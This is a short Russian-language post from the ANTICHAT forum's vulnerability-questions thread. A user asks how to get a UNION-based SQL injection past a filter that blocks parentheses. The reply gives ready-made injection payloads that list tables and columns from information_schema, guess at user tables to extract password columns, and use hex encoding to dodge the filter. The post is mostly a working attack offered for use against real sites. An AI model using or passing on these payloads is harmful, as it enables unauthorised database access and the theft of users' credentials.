ANTICHAT - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от cipa21

Ребята подскажите кто сталкивался, в инъекции не пропускает скобки id=-7888+union+select+1,2,3,database(),5,6,7,8,9,10,11 ,12,13,14,15,16,17--
как это можно обойти?

Попробуй следующие запросы:

id=-7888+union+select+1,2,3,table_name,5,6,7,8,9,10,11 ,12,13,14,15,16,17 from information_schema.tables limit n,1+--+

id=-7888+union+select+1,2,3,column_name,5,6,7,8,9,10,1 1,12,13,14,15,16,17 from information_schema.columns where table_name=[таблица] или 0x[hex таблицы] limit n,1+--+

Попробуй перебор стандартных пользовательских таблиц:

id=-7888+union+select+1,2,3,password,5,6,7,8,9,10,11,1 2,13,14,15,16,17 from [таблица пользователей]+--+

Также иногда помогает hex: 0x[user],0x[password]